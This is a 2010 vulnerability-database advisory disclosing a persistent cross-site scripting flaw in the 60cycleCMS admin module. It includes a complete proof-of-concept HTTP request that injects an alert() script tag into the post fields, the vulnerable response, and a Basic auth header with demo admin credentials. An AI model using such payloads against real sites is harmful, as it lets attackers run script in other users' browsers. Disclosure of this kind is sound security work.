SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

60cycleCMS cross site scripting vulnerability


Arrow  WLB : WLB-2010030040  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-03-11
Arrow  Credit          : Pratul Agrawal
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-03-11] Started

Arrow  Affected software :  60cycleCMS



Arrow  Text :  

==

60cycleCMS Persistent XSS
Vulnerability
==

by

Pratul Agrawal



# Vulnerability found in- Admin module

# email Pratulag@yahoo.com

# company aksitservices

# Credit by Pratul Agrawal

# Software 60cycleCMS

# Category CMS / Portals

# Site p4ge http://www.opensourcecms.com/demo/2/277/60cycleCMS

# Plateform php



# Proof of concept #

Targeted URL:
http://www.opensourcecms.com/demo/2/277/60cycleCMS/private/select.php?act=e
dit


In Edit Field provide the malicious script to store in the Database..
=======================================================================
Request -
=======================================================================
POST /60cyclecms/private/preview.php HTTP/1.1
Host: demo.opensourcecms.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8)
Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://demo.opensourcecms.com/60cyclecms/private/edit.php
Cookie: __utma=87180614.1562082400.1268211497.1268211497.1268211497.1;
__utmb=87180614.6.10.1268211497; __utmc=87180614;
__utmz=87180614.1268211497.1.1.utmcsr=php.opensourcecms.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/scripts/details.php;
PHPSESSID=f6e21193e32af41e62a0c82a839d3a1e
Authorization: Basic YWRtaW46ZGVtbzEyMw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 122


title="><script>alert("XSS")</script>&bod
y="><script>alert("XSS")</script>&time=&a
mp;timezone=

=======================================================================
=======================================================================
Response-
=======================================================================
HTTP/1.1 200 OK
Date: Wed, 10 Mar 2010 09:32:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a
mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 621
Content-Type: text/html

<html>
<body>

<h2>Post Preview:</h2>
<form action="" method="post">
<input type="button" value="Edit Post"
onclick="submitForm(this)">
<input type="button" value="Submit Post"
onclick="submitForm(this)">
</form>

<script type="text/javascript">
function submitForm(button)
{
if (button.value == "Edit Post")
button.form.action = "edit.php";
else
button.form.action = "submit.php";

button.form.submit();
}

</script>

<h2 class="lonelyPost"><a class="titleLink"
href="#">"><script>alert("XSS")</sc
ript></a></h2><h4>Thursday, January 1, 1970 - 12:00
am</h4><p>"><script>alert("XSS")</sc
ript></p></body>
</html>

=======================================================================


After execution Just click on the Edit button and the script get
executed again and again.


#If you have any questions, comments, or concerns, feel free to contact
me.




Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.